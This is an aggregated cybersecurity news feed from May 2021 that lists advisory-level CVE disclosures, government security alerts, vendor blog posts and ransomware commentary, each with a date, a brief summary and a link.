2021-05-19T00:00:00Z | 1621382400

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1235
The bright side of the DARKSIDE ransomware
2021-05-18T16:01:29Z | 1621353689

By now, you’ve probably been bulldozed with solution briefings, white papers, vendor pitches, and webinar invitations to discuss how this ransomware could have been stopped. We’ll do things a little differently. We’ll of course include our resources at the end of this post, because obviously we don’t want to be left behind. But we’ll first […]

https://www.smokescreen.io/the-bright-side-of-the-darkside-ransomware/
One Customer’s ROI Argument for Cato Cloud
2021-05-18T13:55:06Z | 1621346106

When Gartner published its seminal report on SASE (“The Future of Network Security Is in the Cloud, August 2019), the analyst firm listed the reduction of complexity and costs as one of the top benefits of SASE. Each day, Cato customers confirm that‘s the case; there is significant ROI with the simplicity of SASE. Costs... The post One Customer’s ROI Argument for Cato Cloud appeared first on Cato Networks.

https://www.catonetworks.com/blog/one-customers-roi-argument-for-cato-cloud/
A/B Testing, Now with EdgeKV
2021-05-18T04:00:00Z | 1621310400

Now that we've written the framework of our code, let's layer in EdgeKV (EKV), our distributed key-value store database.

https://www.akamai.com/blog/developers/ab-testing-now-with-edgekv
CVE-2021-33056
2021-05-18T00:00:00Z | 1621296000

A NULL pointer dereference vulnerability exists in eXcall_api.c in Antisip eXosip2 through 5.2.0 when handling certain 3xx redirect responses. Read more: "Crashing SIP Clients with a Single Slash" Read more: "Exploiting URL Parsing Confusion"

https://claroty.com/team82/disclosure-dashboard/cve-2021-33056
CVE-2021-32618
2021-05-18T00:00:00Z | 1621296000

CWE-601: URL REDIRECTION TO UNTRUSED SITEA web application accepts a user-controlled input that specifies a link to an external site, and uses that link in a Redirect. This simplifies phishing attacks. Read more: "Exploiting URL Parsing Confusion"

https://claroty.com/team82/disclosure-dashboard/cve-2021-32618
CVE-2021-23385
2021-05-18T00:00:00Z | 1621296000

CWE-601: URL REDIRECTION TO UNTRUSED SITEA web application accepts a user-controlled input that specifies a link to an external site, and uses that link in a Redirect. This simplifies phishing attacks. Read more: "Exploiting URL Parsing Confusion"

https://claroty.com/team82/disclosure-dashboard/cve-2021-23385
Ransomware, the limits of prevention, and active defense
2021-05-17T12:15:38Z | 1621253738

We’re almost halfway through 2021, and there seems to be a ransomware resurgence. Or that’s what the headlines will have you believe. On the contrary, the opposite might be true. According to a Sophos survey, ransomware attacks seem to have gone down in 2021. Only 37% of the organizations surveyed have said they experienced a […]

https://www.smokescreen.io/ransomware-the-limits-of-prevention-and-active-defense/
Já pode aceder ao Relatório Riscos & Conflitos de 2021
2021-05-17T00:00:00Z | 1621209600

O Relatório em causa foca-se no ano de 2020 e perspetiva os anos de 2021 e 2022. Para o efeito, analisa indicadores produzidos pelo próprio CNCS, os contributos de vários parceiros e os dados resultantes de inquéritos realizados à comunidade, a que acresce uma panorâmica sobre dados públicos de outras entidades.Os resultados mostram um aumento das atividades ilícitas online, nomeadamente ao nível dos incidentes de cibersegurança e da cibercriminalidade. A pandemia de Covid-19 marca este período, verificando-se uma coincidência entre o incremento nos incidentes e nas denúncias e o emergir do confinamento social, do trabalho remoto e do uso intenso do digital.É possível destacar alguns aspetos neste Relatório: • “Houve um aumento significativo no volume de incidentes de cibersegurança e nos números dos indicadores de cibercrime em 2020”;• “As ciberameaças mais relevantes em 2020 foram o phishing/smishing, o sistema infetado por malware, o ransomware, algumas formas de intrusão, variados tipos de fraude/burla, a sextortion e a desinformação digital”;• “Houve um aumento na perceção de risco de se sofrer um incidente de cibersegurança no ciberespaço de interesse nacional, em 2020 e em 2021”;• “Existe a perceção de que o ciberespaço de interesse nacional está mais capacitado ou pelo menos igualmente capacitado em 2021, comparando com 2020”.Recorde-se que os resultados deste Relatório permitem ajudar as organizações e os cidadãos a identificarem as ameaças mais importantes no ciberespaço, de modo a melhor se protegerem e com mais conhecimento de causa realizarem análises de risco.O documento pode ser consultado aqui.  Para aceder ao “Relatório em 15 minutos”, clique aqui.

https://dyn.cncs.gov.pt/pt/detalhe/art/135540/ja-pode-aceder-ao-relatorio-riscos-conflitos-de-2021
“Naturalizar competências” é o tema da CDAYS 2021 que este ano regressa à Alfândega do Porto
2021-05-17T00:00:00Z | 1621209600

Dedicada às competências em Cibersegurança e à necessidade de as tornar comuns entre as pessoas e as organizações, a C-Days 2021 pretende “naturalizar competências”. Estamos a falar de tornar a cibersegurança numa preocupação natural e num “saber fazer” assimilado desde os primeiros anos de formação dos cidadãos, mas também, no modo de atuação das Empresas e da Administração Pública.Recorde-se que o contexto de pandemia que vivemos em 2020, e que ainda hoje se faz sentir, obrigou a uma aceleração digital que provocou uma maior dependência das tecnologias digitais e da Internet. Esta situação deixou as pessoas e as organizações mais expostas a vulnerabilidades e ao oportunismo dos cibercriminosos. A necessidade de desenvolver competências em Cibersegurança não é nova, mas ganhou uma pertinência a que urge responder.Com este propósito, a C-Days 2021 irá reunir diversos convidados que se enquadrem num conjunto de debates que articulem uma reflexão sobre as competências em cibersegurança, o atual contexto de dependência digital e as iniciativas europeias nesta área de intervenção. Para isso, contamos com um painel de oradores de excelência, de forma a responder à partilha de conhecimento e experiências na área, sendo cada vez mais este o caminho a seguir para a melhoria destas capacidades em Cibersegurança. À semelhança do ano anterior, esta edição realiza-se em formato streaming, aberto ao público e gratuito, sendo que para assistir basta assistir através do link público que será partilhado nos canais do CNCS.A agenda do evento pode ser consultada aqui .

https://dyn.cncs.gov.pt/pt/detalhe/art/135541/naturalizar-competencias-e-o-tema-da-cdays-2021-que-este-ano-regressa-a-alfandega-do-porto
FIRST 33rd Annual Conference to be streamed live June 7-9, 2021
2021-05-17T00:00:00Z | 1621209600

Under the theme – ‘Crossing Uncertain Times’, the conference will feature prominent global speakers from the Incident Response and Security Teams community

https://www.first.org/newsroom/releases/20210517
Exploit Development: CVE-2021-21551 - Dell ‘dbutil_2_3.sys’ Kernel Exploit Writeup
2021-05-16T00:00:00Z | 1621123200

Analysis and writeup on weaponizing CVE-2021-21551 without a data-only attack and the importance of Virtualization-Based Security, Hypervisor-Protected Code Integrity, Kernel Control-Flow Guard, and other modern mitigations.

/cve-2020-21551-sploit/
SonicWall Email Security Virtual Appliance Static Credential Vulnerability
2021-05-13T14:00:23Z | 1620914423

SonicWall Email Security Virtual Appliance version 10.0.9 and earlier versions contain a default username and a password that is used at initial setup. An attacker could exploit this transitional/temporary user account from the trusted domain to access the Virtual Appliance only when the device is freshly installed and not connected to Mysonicwall. A successful exploit could allow the attacker to log in to the appliance remotely with root privilege access over a local area network. CVE: CVE-2021-20025 Last updated: May 13, 2021, 2 p.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0012
5 Things SASE Covers that SD-WAN Doesn’t
2021-05-13T08:55:53Z | 1620896153

The post 5 Things SASE Covers that SD-WAN Doesn’t appeared first on Cato Networks.

https://www.catonetworks.com/resources/5-things-sase-covers-that-sd-wan-doesnt/
Security Alert (A21-05-09): Multiple Vulnerabilities in Wi-Fi devices
2021-05-13T04:00:00Z | 1620878400

Multiple vulnerabilities are found in Wi-Fi devices that use Wi-Fi 802.11 standard.

https://www.govcert.gov.hk/en/alerts_detail.php
Partnering With Verizon on the 2021 DBIR
2021-05-13T04:00:00Z | 1620878400

By the time you read this post, the 2021 Verizon Data Breach Investigation Report (DBIR) will be published. Akamai has been one of the many partners contributing data to this report for more than half a decade. We greatly value the time, effort, and dedicated data science that goes into providing this level of research to the security community.

https://www.akamai.com/blog/security/partnering-with-verizon-on-the-2021-dbir
How Akamai Employees Showed Up for Akamai Earth Month
2021-05-13T04:00:00Z | 1620878400

Akamai employees across the globe showed up in full force for Akamai Earth Month 2021 -- our campaign to help employees take small actions at home and in their community to make a difference for the planet.

https://www.akamai.com/blog/culture/how-akamai-employees-showed-up-for-akamai-earth-month
CVE-2021-27475
2021-05-13T00:00:00Z | 1620864000

CWE-502: DESERIALIZATION OF UNTRUSTED DATAConnected Components Workbench does not limit the objects that can be deserialized. This vulnerability allows attackers to craft a malicious serialized object that, if opened by a local user in Connected Components Workbench, may result in remote code execution. This vulnerability requires user interaction to be successfully exploited. Read Team82’s report: “Evil PLC Attack: Using a Controller as Predator Rather than Prey”

https://claroty.com/team82/disclosure-dashboard/cve-2021-27475
CVE-2021-27473
2021-05-13T00:00:00Z | 1620864000

CWE-20: IMPROPER INPUT VALIDATION Connected Components Workbench does not sanitize paths specified within the .ccwarc archive file during extraction. This type of vulnerability is also commonly referred to as a Zip Slip. A local, authenticated attacker can create a malicious .ccwarc archive file that, when opened by Connected Components Workbench, will allow the attacker to gain the privileges of the software. If the software is running at SYSTEM level, the attacker will gain admin level privileges. User interaction is required for this exploit to be successful. Read Team82’s report: “Evil PLC Attack: Using a Controller as Predator Rather than Prey”

https://claroty.com/team82/disclosure-dashboard/cve-2021-27473
CVE-2021-27471
2021-05-13T00:00:00Z | 1620864000

CWE-22: PATH TRAVERSALThe parsing mechanism that processes certain file types does not provide input sanitization for file paths. This may allow an attacker to craft malicious files that, when opened by Connected Components Workbench, can traverse the file system. If successfully exploited, an attacker could overwrite existing files and create additional files with the same permissions of the Connected Components Workbench software. User interaction is required for this exploit to be successful. Read Team82’s report: “Evil PLC Attack: Using a Controller as Predator Rather than Prey”

https://claroty.com/team82/disclosure-dashboard/cve-2021-27471
Visualize and Analyze Bots With Real User Monitoring
2021-05-12T13:00:00Z | 1620824400

https://www.akamai.com/blog/security/visualize-bots-with-real-user-monitoring
High Threat Security Alert (A21-05-07): Multiple Vulnerabilities in Microsoft Products (May 2021)
2021-05-12T04:00:00Z | 1620792000

Microsoft has released security updates addressing multiple vulnerabilities which affect several Microsoft products or components.

https://www.govcert.gov.hk/en/alerts_detail.php
High Threat Security Alert (A21-05-08): Multiple Vulnerabilities in Adobe Reader/Acrobat
2021-05-12T04:00:00Z | 1620792000

Security updates are released for Adobe Reader and Acrobat to address multiple vulnerabilities.

https://www.govcert.gov.hk/en/alerts_detail.php
Visualize and Analyze Bots with Real User Monitoring
2021-05-12T04:00:00Z | 1620792000

You interact with more than just customers on your website. Bots make up a disproportionate amount of traffic, which can skew human behavior analysis data -- and cause you to make the wrong business decisions.

https://www.akamai.com/blog/security/visualize-and-analyze-bots-with-real-user-monitoring
CVE-2021-32611
2021-05-12T00:00:00Z | 1620777600

CWE-476: NULL POINTER DEREFERENCE A NULL pointer dereference vulnerability exists in eXcall_api.c in Antisip eXosip2 through 5.2.0 when handling certain 3xx redirect responses.

https://claroty.com/team82/disclosure-dashboard/cve-2021-32611
Targeting critical infrastructure has critical implications
2021-05-11T14:34:34Z | 1620743674

The ransomware group that targeted the Colonial Pipeline claims they are in it for the money, not for a political reason. An interesting predicament for the attackers, defenders and the future of such attacks. The recent ransomware attack on Colonial Pipeline is yet another brutal reminder of the implications of cyber security breaches. The attack’s... The post Targeting critical infrastructure has critical implications appeared first on Cato Networks.

https://www.catonetworks.com/blog/targeting-critical-infrastructure-has-critical-implications/
How A Philosophy of Agility Led to Our New MSP-Centric Partner Program
2021-05-11T13:34:48Z | 1620740088

Today, we announced the expansion of our Global Partner Program with an eye on helping MSPs and channel partners everywhere benefit from the power of SASE. From its inception, Cato focused on solving the problems caused by the complexity and rigidity of legacy IT infrastructure. The result was a new kind of infrastructure, one that brought the... The post How A Philosophy of Agility Led to Our New MSP-Centric Partner Program appeared first on Cato Networks.

https://www.catonetworks.com/blog/how-a-philosophy-of-agility-led-to-our-new-msp-centric-partner-program/
How Consolidated Security Became the New Best-of-Breed
2021-05-11T08:35:27Z | 1620722127

The IT Manager’s Dilemma  IT professionals are constantly making decisions regarding which security solutions they should purchase to protect their organizations. One of the most common dilemmas they face is whether to go with a consolidated, “Swiss army knife,” solution or choose a number of stand-alone, best-of-breed, products. A consolidated solution has clear advantages such as simpler integration, no interoperability risk, less expertise required to manage multiple siloed solutions and, usually, a lower... The post How Consolidated Security Became the New Best-of-Breed appeared first on Cato Networks.

https://www.catonetworks.com/blog/how-consolidated-security-became-the-new-best-of-breed/
Security Alert (A21-05-06): Multiple Vulnerabilities in Google Chrome
2021-05-11T04:00:00Z | 1620705600

Google released a security update to address multiple vulnerabilities in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
Why Developers Are Writing Apps on Our Edge Platform
2021-05-11T04:00:00Z | 1620705600

A lot of companies talk about edge computing today, but at Akamai, we've been doing it for more than 20 years.

https://www.akamai.com/blog/trends/why-developers-are-writing-apps-on-our-edge-platform
Adobe Acrobat Reader DC JavaScript search query code execution vulnerability
2021-05-11T00:00:00Z | 1620691200

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1233
CVE-2021-22740
2021-05-11T00:00:00Z | 1620691200

CWE-200: EXPOSURE OF SENSITIVE INFORMATION TO AN UNAUTHORIZED ACTORA vulnerability exists in homeLYnk (Wiser For KNX) and spaceLYnk V2.60 and prior which could cause a device to be compromised when it is first configured.

https://claroty.com/team82/disclosure-dashboard/cve-2021-22740
CVE-2021-22739
2021-05-11T00:00:00Z | 1620691200

CWE-200: EXPOSURE OF SENSITIVE INFORMATION TO AN UNAUTHORIZED ACTORA vulnerability exists in homeLYnk (Wiser For KNX) and spaceLYnk V2.60 and prior which could cause a device to be compromised when it is first configured.

https://claroty.com/team82/disclosure-dashboard/cve-2021-22739
CVE-2021-22738
2021-05-11T00:00:00Z | 1620691200

CWE-327: USE OF A BROKEN OR RISKY CRYPTOGRAPHIC ALGORITHMA vulnerability exists in homeLYnk (Wiser For KNX) and spaceLYnk V2.60 and prior that could cause unauthorized access when credentials are discovered after a brute force attack.

https://claroty.com/team82/disclosure-dashboard/cve-2021-22738
CVE-2021-22737
2021-05-11T00:00:00Z | 1620691200

CWE-522: INSUFFICIENTLY PROTECTED CREDENTIALS A vulnerability exists in homeLYnk (Wiser For KNX) and spaceLYnk V2.60 and prior that could cause unauthorized access of when credentials are discovered after a brute force attack.

https://claroty.com/team82/disclosure-dashboard/cve-2021-22737
CVE-2021-22736
2021-05-11T00:00:00Z | 1620691200

CWE-22: IMPROPER LIMITATION OF A PATHNAME TO A RESTRICTED DIRECTORY ('PATH TRAVERSAL') A vulnerability exists in homeLYnk (Wiser For KNX) and spaceLYnk V2.60 and prior which could cause a denial of service when an unauthorized file is uploaded.

https://claroty.com/team82/disclosure-dashboard/cve-2021-22736
CVE-2021-22735
2021-05-11T00:00:00Z | 1620691200

CWE-347: IMPROPER VERIFICATION OF CRYPTOGRAPHIC SIGNATUREVulnerability exists in homeLYnk (Wiser For KNX) and spaceLYnk V2.60 and prior which could allow remote code execution when unauthorized code is copied to the device.

https://claroty.com/team82/disclosure-dashboard/cve-2021-22735
CVE-2021-22734
2021-05-11T00:00:00Z | 1620691200

CWE-347: IMPROPER VERIFICATION OF CRYPTOGRAPHIC SIGNATURE: Vulnerability exists in homeLYnk (Wiser For KNX) and spaceLYnk V2.60 and prior which could cause remote code execution when an attacker loads unauthorized code.

https://claroty.com/team82/disclosure-dashboard/cve-2021-22734
CVE-2021-22733
2021-05-11T00:00:00Z | 1620691200

CWE-269: IMPROPER PRIVILEGE MANAGEMENT The software does not properly assign, modify, track, or check privileges for an actor, creating an unintended sphere of control for that actor.

https://claroty.com/team82/disclosure-dashboard/cve-2021-22733
CVE-2021-22732
2021-05-11T00:00:00Z | 1620691200

CWE-269: IMPROPER PRIVILEGE MANAGEMENT The software does not properly assign, modify, track, or check privileges for an actor, creating an unintended sphere of control for that actor.

https://claroty.com/team82/disclosure-dashboard/cve-2021-22732
Timanttiteko award for 2020 awarded to National Cyber Security Centre Finland
2021-05-07T12:57:11Z | 1620392231

The Security Committee has granted its 2020 Timanttiteko (Diamond Act) award to the National Cyber Security Centre Finland for the exemplary promotion of the objectives specified in the Security Strategy for Society.

https://www.kyberturvallisuuskeskus.fi/en/news/timanttiteko-award-2020-awarded-national-cyber-security-centre-finland
Timanttiteko award for 2020 awarded to National Cyber Security Centre Finland
2021-05-07T12:57:11Z | 1620392231

The Security Committee has granted its 2020 Timanttiteko (Diamond Act) award to the National Cyber Security Centre Finland for the exemplary promotion of the objectives specified in the Security Strategy for Society.

https://www.kyberturvallisuuskeskus.fi/en/news/timanttiteko-award-2020-awarded-national-cyber-security-centre-finland
Data stolen from Facebook in 2019 published – includes information on 1.2 million Finns
2021-05-07T12:20:34Z | 1620390034

According to news outlets, the data stolen from Facebook in 2019 has been published on an online hacker forum. This includes data on a total of 533 million people, of which a little more than 1.2 million are Finns. There were attempts to sell the same information in January 2021 through automatic software available in the Telegram messaging service.

https://www.kyberturvallisuuskeskus.fi/en/news/data-stolen-facebook-2019-published-includes-information-12-million-finns
Alert concerning a vulnerability in Microsoft Exchange removed
2021-05-07T09:21:54Z | 1620379314

We discontinued the alert concerning a vulnerability in Microsoft Exchange e-mail servers, because there were no further reports of successful exploitation of the vulnerability. According to our survey, Exchange servers in Finnish organisations had been updated in late March.

https://www.kyberturvallisuuskeskus.fi/en/Varoituksenpoisto_TTN_0121
Cyber weather was changeable in March
2021-05-07T09:17:30Z | 1620379050

The Exchange server vulnerability caused various weather phenomena in March. In addition to this, scam phone calls from technical support and scams conducted as OmaPosti still continue to pester us all.

https://www.kyberturvallisuuskeskus.fi/en/ajankohtaista/kybersaa-maaliskuu-2021
Cyber weather was changeable in March
2021-05-07T09:17:30Z | 1620379050

The Exchange server vulnerability caused various weather phenomena in March. In addition to this, scam phone calls from technical support and scams conducted as OmaPosti still continue to pester us all.

https://www.kyberturvallisuuskeskus.fi/en/ajankohtaista/kybersaa-maaliskuu-2021
6 takeaways from GOV.UK’s 2021 cybersecurity breaches survey
2021-05-06T08:32:48Z | 1620289968

COVID-19 has impacted security measures like monitoring, fewer organizations are detecting threats, phishing is the most common threat, and more. Includes active defense recommendations.

https://www.smokescreen.io/6-takeaways-from-gov-uks-2021-cybersecurity-breaches-survey/
Security Alert (A21-05-05): Multiple Vulnerabilities in Cisco Products
2021-05-06T04:00:00Z | 1620273600

Cisco released security advisories to address multiple vulnerabilities in Cisco devices and software.

https://www.govcert.gov.hk/en/alerts_detail.php
Defeating the Pirates
2021-05-06T04:00:00Z | 1620273600

In Akamai's paper, "Inside the World of Video Pirates," we discovered why digital intellectual property theft (aka "piracy") is possibly the most misunderstood form of cybercrime facing the TV, sports, and film industries.

https://www.akamai.com/blog/security/defeating-the-pirates
Foxit Reader FileAttachment annotation use-after-free vulnerability
2021-05-06T00:00:00Z | 1620259200

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1287
Security Alert (A21-05-04): Vulnerability in Dell products
2021-05-05T04:00:00Z | 1620187200

Dell has released a security advisory update to fix an insufficient access control vulnerability in the Dell dbutil driver.

https://www.govcert.gov.hk/en/alerts_detail.php
Two Years of Tax Phishing - The Oldest Scam in the Book
2021-05-05T04:00:00Z | 1620187200

Tax scams are some of the oldest scams in a criminal's book, and they're highly attractive to criminals for many reasons.

https://www.akamai.com/blog/security/two-years-of-tax-phishing-the-oldest-scam-in-the-book
What is a Cloud Firewall?
2021-05-04T06:28:51Z | 1620109731

Cracks are forming at the base of the cloud firewall. Those virtualized instances of the security perimeter vital to protecting cloud assets against unauthorized attempts to access an organization’s cloud resources have begun showing their age. The shift to multicloud strategies and the rapid evolution of network-based threats are uncovering weaknesses in cloud firewalls. Instead,... The post What is a Cloud Firewall? appeared first on Cato Networks.

https://www.catonetworks.com/blog/what-is-a-cloud-firewall/
High Threat Security Alert (A21-05-02): Multiple Vulnerabilities in Apple iOS and iPadOS
2021-05-04T04:00:00Z | 1620100800

Apple has released iOS 14.5.1 and iPadOS 14.5.1 as well as iOS 12.5.3 to fix the vulnerabilities in various Apple devices.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A21-05-03): Multiple Vulnerabilities in Android
2021-05-04T04:00:00Z | 1620100800

Google has released Android Security Bulletin May 2021 to fix multiple security vulnerabilities in Android operating system.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A21-05-01): Vulnerability in ISC BIND
2021-05-03T04:00:00Z | 1620014400

ISC has released a security update to fix a vulnerability in BIND.

https://www.govcert.gov.hk/en/alerts_detail.php
Ohana ? An Impact an ERG Can Make
2021-04-30T04:00:00Z | 1619755200

Akamai's Ohana ERG launched in 2015, along with a number of other ERGs, with the mission to broaden and facilitate the inclusion and contributions of employees of African American, Black, Hispanic, and Latin American descent and association.

https://www.akamai.com/blog/culture/ohana-an-impact-an-erg-can-make
Projeto sobre deteção do discurso de ódio arranca dia 1 maio
2021-04-30T00:00:00Z | 1619740800

O projeto que tem como foco o contexto da atual pandemia COVID-19 pretende, não só identificar os potenciais alvos de discurso de ódio no contexto português, como também, naquilo que acontece nas redes sociais pela comunidade portuguesa. O projeto é financiado pela Fundação para a Ciência e Tecnologia (FTC). Desta forma, o financiamento do Instituto de Engenharia de Sistemas e Computadores - Investigação e Desenvolvimento (INESC-ID), de Lisboa, visa analisar o discurso de ódio no contexto nacional da atual pandemia.O estudo tem a duração de 10 meses e envolve uma equipa interdisciplinar, constituída por elementos do CNCS, INESC e da Agência LUSA.Para mais informações, aceda aqui . 

https://dyn.cncs.gov.pt/pt/detalhe/art/135539/projeto-sobre-detecao-do-discurso-de-odio-arranca-dia-1-maio
CVE-2021-22685
2021-04-30T00:00:00Z | 1619740800

CWE-22: PATH TRAVERSALSuccessful exploitation of this vulnerability could allow an attacker to read any file from the Access Controller server. Read more" "Bugs in the Cloud: How One Vulnerability Exposed 'Offline' Devices to a Security Risk"

https://claroty.com/team82/disclosure-dashboard/cve-2021-22685
Eesti küberruumi ülevaade: Microsoft Exchange’i haavatavus seadis Eestis ohtu vähemalt 80 meiliserverit
2021-04-29T09:20:01Z | 1619688001

Tehnoloogiahiid Microsoft avalikustas 2. märtsil tõsise haavatavuse oma meiliserveri tarkvaras. Kurjategijad lõid pärast nõrkuse ilmsiks tulemist tööriistad, kuidas nõrkust ära kasutada ja kaitseta servereid leida, ning neil oli võimalik pääseda ligi kogu serverile, sealhulgas e-kirjadele ja salasõnadele.

https://ria.ee/uudised/eesti-kuberruumi-ulevaade-microsoft-exchangei-haavatavus-seadis-eestis-ohtu-vahemalt-80
High Threat Security Alert (A21-04-12): Multiple Vulnerabilities in Cisco Products
2021-04-29T04:00:00Z | 1619668800

Cisco released security advisories to address multiple vulnerabilities in Cisco devices and software.

https://www.govcert.gov.hk/en/alerts_detail.php
Anyone For a Smart Network Slice?
2021-04-29T04:00:00Z | 1619668800

As with any standardization effort, development of 5G specifications accounted for numerous technology trends and new use cases.

https://www.akamai.com/blog/security/anyone-for-a-smart-network-slice
CISA Emergency Directive 21-03: VPN Vulnerabilities Actively Exploited
2021-04-29T04:00:00Z | 1619668800

On April 20, 2021, the Department of Homeland Security Cybersecurity and Infrastructure Security Agency (CISA) released an alert on the exploitation of Pulse Connect Secure Vulnerabilities with Alert AA21-110A: Exploitation of Pulse Connect Secure Vulnerabilities, as well as Emergency Directive (ED) 21-03, after a FireEye blog shed light on security incidents involving compromises of Pulse Secure VPN appliances.

https://www.akamai.com/blog/news/cisa-emergency-directive-21-03-vpn-vulnerabilities-actively-exploited
Observed Changes to the Threat Landscape in 2020
2021-04-28T04:00:00Z | 1619582400

Reflecting on the cybersecurity threat landscape in 2020, we can't overlook the massive changes that landed on us. Global security attacks increased at a significant pace between 2019 and 2020, and the COVID-19 pandemic only deepened these troubling conditions.

https://www.akamai.com/blog/trends/observed-changes-to-the-threat-landscape-in-2020
Supporting Akamai Communities Impacted by COVID-19
2021-04-28T04:00:00Z | 1619582400

While those of us in places like the U.S. are experiencing some relief with access to the COVID-19 vaccine, it has been heartbreaking to see surges in infection, hospitalization, and death across the globe, including the dire situation in India.

https://www.akamai.com/blog/news/supporting-akamai-communities-impacted-by-covid-19
CVE-2021-29241
2021-04-28T00:00:00Z | 1619568000

CWE-476: NULL POINTER DEREFERENCECrafted communication requests may cause a Null pointer dereference in the affected CODESYS products and may result in a denial-of-service condition.

https://claroty.com/team82/disclosure-dashboard/cve-2021-29241
CVE-2021-29240
2021-04-28T00:00:00Z | 1619568000

CWE-345: INSUFFICIENT VERIFICATION OF DATA AUTHENTICITYThe Package Manager of the CODESYS Development System does not check the validity of packages before installation and may be used to install CODESYS packages with malicious content. Read more: "Top-Down and Bottom-Up: Exploiting Vulnerabilities in the OT Cloud Era"

https://claroty.com/team82/disclosure-dashboard/cve-2021-29240
CVE-2021-29238
2021-04-28T00:00:00Z | 1619568000

CWE-352: CROSS-SITE REQUEST FORGERYManipulated files of a CODESYS Web Visualization deployed on a controller can lead to a privilege escalation when the Web Visualization is opened with the CODESYS Automation Server. Read more: "Top-Down and Bottom-Up: Exploiting Vulnerabilities in the OT Cloud Era"

https://claroty.com/team82/disclosure-dashboard/cve-2021-29238
Cato SASE Cloud: The Future SASE – Today and Tomorrow
2021-04-27T12:01:13Z | 1619524873

The post Cato SASE Cloud: The Future SASE – Today and Tomorrow appeared first on Cato Networks.

https://www.catonetworks.com/resources/cato-sase-cloud-the-future-sase-today-and-tomorrow/
Examining JavaScript Inter-Process Communication in Firefox
2021-04-27T10:50:08Z | 1619520608

Firefox uses Inter-Process Communication (IPC) to implement privilege separation, which makes it an important cornerstone in our security architecture. A previous blog post focused on fuzzing the C++ side … Read more

https://blog.mozilla.org/attack-and-defense/2021/04/27/examining-javascript-inter-process-communication-in-firefox/
High Threat Security Alert (A21-04-10): Multiple Vulnerabilities in Apple iOS and iPadOS
2021-04-27T04:00:00Z | 1619496000

Apple has released iOS 14.5 and iPadOS 14.5 to fix the vulnerabilities in various Apple devices.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A21-04-11): Multiple Vulnerabilities in Google Chrome
2021-04-27T04:00:00Z | 1619496000

Google released a security update to address multiple vulnerabilities in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
Why Public Internet Routing Sucks
2021-04-26T17:21:00Z | 1619457660

The post Why Public Internet Routing Sucks appeared first on Cato Networks.

https://www.catonetworks.com/resources/why-public-internet-routing-sucks/
Lessons Learned from the COVID-19 WFH Frenzy
2021-04-26T16:13:00Z | 1619453580

The post Lessons Learned from the COVID-19 WFH Frenzy appeared first on Cato Networks.

https://www.catonetworks.com/resources/lessons-learned-from-the-covid-19-wfh-frenzy/
Remote Access Security: The Dangers of VPN
2021-04-26T11:09:02Z | 1619435342

Millions of people worldwide are still working remotely to support shelter-in-place requirements brought on by the pandemic. For many workers, a remote workstyle is a preference that will likely become a more permanent arrangement. Enterprises have responded by expanding their use of VPNs to provide remote access to the masses, but is this the right choice for long-term access?  Aside from enabling easy connectivity,... The post Remote Access Security: The Dangers of VPN appeared first on Cato Networks.

https://www.catonetworks.com/blog/remote-access-security-the-dangers-of-vpn-2/
Don't Risk Getting Caught by Kr3pto Phishing Kits
2021-04-26T04:00:00Z | 1619409600

https://www.akamai.com/blog/security/dont-risk-getting-caught-by-kr3pto-phishing-kits
Systemd DHCP client denial-of-service vulnerability
2021-04-26T00:00:00Z | 1619395200

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1142
MZ Automation GmbH lib60870.NET ASDU message processing denial of service vulnerability
2021-04-26T00:00:00Z | 1619395200

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1236
Security Alert (A21-04-09): Vulnerability in Drupal
2021-04-23T04:00:00Z | 1619150400

Drupal has released a security advisory to address a vulnerability of improper sanitisation of API requests in Drupal Core.

https://www.govcert.gov.hk/en/alerts_detail.php
Pulse Connect Secure remote access vulnerability
2021-04-22T13:44:29Z | 1619099069

On 20 April 2021, Pulse Secure released an out-of-cycle mitigation tool regarding a critical remote access vulnerability. The vulnerability must be addressed immediately, as it is being actively exploited.

https://www.kyberturvallisuuskeskus.fi/en/haavoittuvuus_12/2021
Innovative Ways Customers Compute on the Edge
2021-04-22T04:00:00Z | 1619064000

Moving everything closer to the edge is the key to delivering better, faster experiences to people through billions of devices around the world.

https://www.akamai.com/blog/trends/innovative-ways-customers-compute-on-the-edge
Announcing Akamai's 2030 Sustainability Goals
2021-04-22T04:00:00Z | 1619064000

There are 4.66 billion (yes, with a B) internet users. Rough math will tell us that's three in every five people around the world -- talk about lessening the six degrees. I see head nods and shoulder shrugs. 4.66 billion people?

https://www.akamai.com/blog/culture/announcing-akamais-2030-sustainability-goals
Trend Micro Inc. Home Network Security tdts.ko TRF file-parsing denial-of-service vulnerability
2021-04-22T00:00:00Z | 1619049600

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1240
Trend Micro Inc. Home Network Security tdts.ko TRF file-parsing denial-of-service vulnerability
2021-04-22T00:00:00Z | 1619049600

https://talosintelligence.com/vulnerability_reports/TALOS-2021-1239
O CNCS aconselha todas as entidades que atualizem os dispositivos QNAP
2021-04-22T00:00:00Z | 1619049600

Foi divulgado que está a ocorrer um ataque de ransomware dirigido a estes equipamentos onde através da exploração de vulnerabilidades o atacante está a aceder aos sistemas e a criar ficheiros 7zip que contêm todos os dados protegidos com uma palavra-passe (apenas conhecida pelo atacante).Como medida de mitigação imediata devem ser efetuados os seguintes procedimentos[1]:• Verificar se no "QNAP Resource Monitor" existem processos 7zip a serem executados. Em caso positivo deve consultar a notícias em [2];• Atualizar a aplicação "Malware Remover" e efetuar um scan ao equipamento;• Todas as aplicações (ex: Multimedia Console, Media Streaming, etc...) devem ser atualizadas para as últimas versões disponíveis;• A página de gestão da QNAP não deve estar disponível a partir da Internet.• Devem ser efetuadas cópias de segurança dos dados para outros dispositivos externos e esses equipamentos devem ser desligados do equipamento original (ex: cabo USB, cabo de rede).No caso de ter sido afetado (parcial ou totalmente), os utilizadores não devem desligar os equipamentos e devem contatar os serviços da QNAP através do seguinte URL.Salienta-se ainda que foram divulgadas, recentemente, duas vulnerabilidades, que podem ser conhecidas aqui.  [1] https://www.qnap.com/en/news/2021/response-to-qlocker-ransomware-attacks-take-actions-to-secure-qnap-nas [2] 